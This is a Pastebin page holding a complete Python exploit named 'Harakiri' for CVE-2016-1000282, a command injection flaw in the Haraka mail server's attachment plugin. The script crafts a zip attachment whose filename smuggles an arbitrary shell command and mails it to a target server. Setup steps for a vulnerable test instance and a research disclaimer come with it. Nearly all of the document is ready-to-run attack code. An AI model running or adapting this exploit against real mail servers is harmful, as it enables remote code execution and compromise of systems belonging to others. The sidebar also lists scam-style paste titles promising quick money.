Pastebin
API
tools
faq
paste
Login
Sign up
Please fix the following errors:
New Paste
Syntax Highlighting
#!/usr/bin/python # Exploit Title: Harakiri # ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection # Exploit Author: xychix [xychix at hotmail.com] / [mark at outflank.nl] # Date: 26 January 2017 # Category: Remote Code Execution # Vendor Homepage: https://haraka.github.io/ # Vendor Patch: https://github.com/haraka/Haraka/pull/1606 # Software Link: https://github.com/haraka/Haraka # Exploit github: http://github.com/outflankbv/Exploits/ # Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8 # Version: <= Haraka 2.8.8 (with attachment plugin enabled) # Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS # Tested versions: 2.8.8 and 2.7.2 # CVE : CVE-2016-1000282 # Credits to: smfreegard for finding and reporting the vulnerability # Thanks to: Dexlab.nl for asking me to look at Haraka. # # Instructions for testing the exploit below. # The zip is also saved to disk and can be attached using any mail client. # As it's processed in a vulnerable server it will run the embedded command # # Disclaimer: # This software has been created purely for the purposes of academic research and # for the development of effective defensive techniques, and is not intended to be # used to attack systems except where explicitly authorized. Project maintainers # are not responsible or liable for misuse of the software. Use responsibly. # # This is to be considered a responsible disclosure due to the availability of an effective patch. Install_and_test_exploit =""" THIS A INSTALLATION GUILDELINE FOR A VULNERABLE HARAKA INSTANCE FOR TESTING THE EXPLOIT #Install a clean server (for example on Digital Ocean) #I picked the smallest Ubuntu 16.04.1 LTS for this guide. #I needed to enable swap on that installation fallocate -l 4G /swapfile chmod 600 /swapfile mkswap /swapfile swapon /swapfile swapon -s #install nodejs and npm: Note I have no clue what I'm doing here but it works! apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz tar xvzf v2.8.8.tar.gz cd Haraka-2.8.8/ npm install -g npm ln -s /usr/bin/nodejs /usr/bin/node npm install -g #Haraka setup haraka -i /root/haraka cat << EOF > /root/haraka/config/plugins access rcpt_to.in_host_list data.headers attachment test_queue max_unrecognized_commands EOF cat << EOF >> /root/haraka/config/host_list haraka.test EOF # Launch haraka as root haraka -c /root/haraka/ #### EXPLOIT TIME ./harakiri.py -c "id > /tmp/harakiri" -t root@haraka.test -m <<IP OF TESTMACHINE HERE>> ## now CTRL^C haraka on the server and: cat /tmp/harakiri # I'll leave the rest up to you """ import smtplib from email.mime.application import MIMEApplication from email.mime.multipart import MIMEMultipart from email.utils import COMMASPACE, formatdate from email.header import Header from email.utils import formataddr from email.mime.text import MIMEText from datetime import datetime import zipfile import StringIO import argparse import sys banner = u"""## ## ### ######## ### ## ## #### ######## #### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ######### ## ## ######## ## ## ##### ## ######## ## ## ## ######### ## ## ######### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #### ## ## #### -o- by Xychix, 26 January 2017 --- -o- xychix [at] hotmail.com --- -o- exploit haraka node.js mailserver <= 2.8.8 (with attachment plugin activated) -- -i- info: https://github.com/haraka/Haraka/pull/1606 (the change that fixed this) """ def SendMail(to,mailserver,cmd,mfrom): msg = MIMEMultipart() html = "harakiri" msg['Subject'] = "harakiri" msg['From'] = mfrom msg['To'] = to f = "harakiri.zip" msg.attach(MIMEText(html)) filename = "harakiri-%s.zip"%datetime.now().strftime("%Y%m%d-%H%M%S") print("Send harariki to %s, attachment saved as %s, commandline: %s , mailserver %s is used for delivery"%(to,filename,cmd,mailserver)) part = MIMEApplication(CreateZip(cmd,filename),Name="harakiri.zip") part['Content-Disposition'] = 'attachment; filename="%s"' % "harakiri.zip" msg.attach(part) print msg.as_string() s = smtplib.SMTP(mailserver,25) try: resp = s.sendmail(mfrom, to, msg.as_string()) except smtplib.SMTPDataError, err: if err[0] == 450: print("[HARAKIRI SUCCESS] SMTPDataError is most likely an error unzipping the archive, which is what we want [%s]"%err[1]) return() print("smtpd response: %s No errors received"%(resp)) s.close() return() class InMemoryZip(object): def __init__(self): self.in_memory_zip = StringIO.StringIO() def append(self, filename_in_zip, file_contents): zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False) zf.writestr(filename_in_zip, file_contents) for zfile in zf.filelist: zfile.create_system = 0 return self def read(self): self.in_memory_zip.seek(0) return self.in_memory_zip.read() def writetofile(self, filename): f = file(filename, "w") f.write(self.read()) f.close() def CreateZip(cmd="touch /tmp/harakiri",filename="harakiri.zip"): z1 = InMemoryZip() z2 = InMemoryZip() z2.append("harakiri.txt", banner) z1.append("a\";%s;echo \"a.zip"%cmd, z2.read()) z1.writetofile(filename) return(z1.read()) if __name__ == '__main__': print(banner) parser = argparse.ArgumentParser(description='Harakiri') parser.add_argument('-c','--cmd', help='command to run', required=True) parser.add_argument('-t','--to', help='victim email, mx record must point to vulnerable server', required=True) parser.add_argument('-m','--mailserver', help='mailserver to talk to, you can consider putting the vuln server here if the mx records aren\'t correct', required=True) parser.add_argument('-f','--from', help='optional: From email address', required=False, default="harakiri@exploit.db") args = vars(parser.parse_args()) SendMail(args['to'],args['mailserver'],args['cmd'],args['from'])
Optional Paste Settings
Category:
None
Cryptocurrency
Cybersecurity
Fixit
Food
Gaming
Haiku
Help
History
Housing
Jokes
Legal
Money
Movies
Music
Pets
Photo
Science
Software
Source Code
Spirit
Sports
Travel
TV
Writing
Tags:
Syntax Highlighting:
None
Bash
C
C#
C++
CSS
HTML
JSON
Java
JavaScript
Lua
Markdown (PRO members only)
Objective C
PHP
Perl
Python
Ruby
Swift
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
ABAP
AIMMS
ALGOL 68
APT Sources
ARM
ASM (NASM)
ASP
ActionScript
ActionScript 3
Ada
Apache Log
AppleScript
Arduino
Asymptote
AutoIt
Autohotkey
Avisynth
Awk
BASCOM AVR
BNF
BOO
Bash
Basic4GL
Batch
BibTeX
Blitz Basic
Blitz3D
BlitzMax
BrainFuck
C
C (WinAPI)
C Intermediate Language
C for Macs
C#
C++
C++ (WinAPI)
C++ (with Qt extensions)
C: Loadrunner
CAD DCL
CAD Lisp
CFDG
CMake
COBOL
CSS
Ceylon
ChaiScript
Chapel
Clojure
Clone C
Clone C++
CoffeeScript
ColdFusion
Cuesheet
D
DCL
DCPU-16
DCS
DIV
DOT
Dart
Delphi
Delphi Prism (Oxygene)
Diff
E
ECMAScript
EPC
Easytrieve
Eiffel
Email
Erlang
Euphoria
F#
FO Language
Falcon
Filemaker
Formula One
Fortran
FreeBasic
FreeSWITCH
GAMBAS
GDB
GDScript
Game Maker
Genero
Genie
GetText
Go
Godot GLSL
Groovy
GwBasic
HQ9 Plus
HTML
HTML 5
Haskell
Haxe
HicEst
IDL
INI file
INTERCAL
IO
ISPF Panel Definition
Icon
Inno Script
J
JCL
JSON
Java
Java 5
JavaScript
Julia
KSP (Kontakt Script)
KiXtart
Kotlin
LDIF
LLVM
LOL Code
LScript
Latex
Liberty BASIC
Linden Scripting
Lisp
Loco Basic
Logtalk
Lotus Formulas
Lotus Script
Lua
M68000 Assembler
MIX Assembler
MK-61/52
MPASM
MXML
MagikSF
Make
MapBasic
Markdown (PRO members only)
MatLab
Mercury
MetaPost
Modula 2
Modula 3
Motorola 68000 HiSoft Dev
MySQL
Nagios
NetRexx
Nginx
Nim
NullSoft Installer
OCaml
OCaml Brief
Oberon 2
Objeck Programming Langua
Objective C
Octave
Open Object Rexx
OpenBSD PACKET FILTER
OpenGL Shading
Openoffice BASIC
Oracle 11
Oracle 8
Oz
PARI/GP
PCRE
PHP
PHP Brief
PL/I
PL/SQL
POV-Ray
ParaSail
Pascal
Pawn
Per
Perl
Perl 6
Phix
Pic 16
Pike
Pixel Bender
PostScript
PostgreSQL
PowerBuilder
PowerShell
ProFTPd
Progress
Prolog
Properties
ProvideX
Puppet
PureBasic
PyCon
Python
Python for S60
QBasic
QML
R
RBScript
REBOL
REG
RPM Spec
Racket
Rails
Rexx
Robots
Roff Manpage
Ruby
Ruby Gnuplot
Rust
SAS
SCL
SPARK
SPARQL
SQF
SQL
SSH Config
Scala
Scheme
Scilab
SdlBasic
Smalltalk
Smarty
StandardML
StoneScript
SuperCollider
Swift
SystemVerilog
T-SQL
TCL
TeXgraph
Tera Term
TypeScript
TypoScript
UPC
Unicon
UnrealScript
Urbi
VB.NET
VBScript
VHDL
VIM
Vala
Vedit
VeriLog
Visual Pro Log
VisualBasic
VisualFoxPro
WHOIS
WhiteSpace
Winbatch
XBasic
XML
XPP
Xojo
Xorg Config
YAML
YARA
Z80 Assembler
ZXBasic
autoconf
jQuery
mIRC
newLISP
q/kdb+
thinBasic
Paste Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Exposure:
Public
Unlisted
Private
Folder:
(members only)
Password
NEW
Enabled
Disabled
Burn after read
NEW
Paste Name / Title:
Create New Paste
Hello
Guest
Sign Up
or
Login
Sign in with Facebook
Sign in with Twitter
Sign in with Google
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Pastes
Swapzone Glitch ⭐Working⭐
JavaScript | 3 sec ago | 0.26 KB
Exchange Exploit
JavaScript | 7 sec ago | 0.26 KB
Free Crypto Method (NEVER SEEN BEFORE)
JavaScript | 11 sec ago | 0.26 KB
✅ MAKE $900 INSTANTLY
JavaScript | 22 sec ago | 0.26 KB
✅ MAKE $500 IN 15 MIN
JavaScript | 28 sec ago | 0.26 KB
⭐ Instant Profit Method ⭐
JavaScript | 46 sec ago | 0.26 KB
✅ Make $1500 in 20 minutes
JavaScript | 51 sec ago | 0.26 KB
✅ Exploit 500$ in 15 Minutes
JavaScript | 55 sec ago | 0.26 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!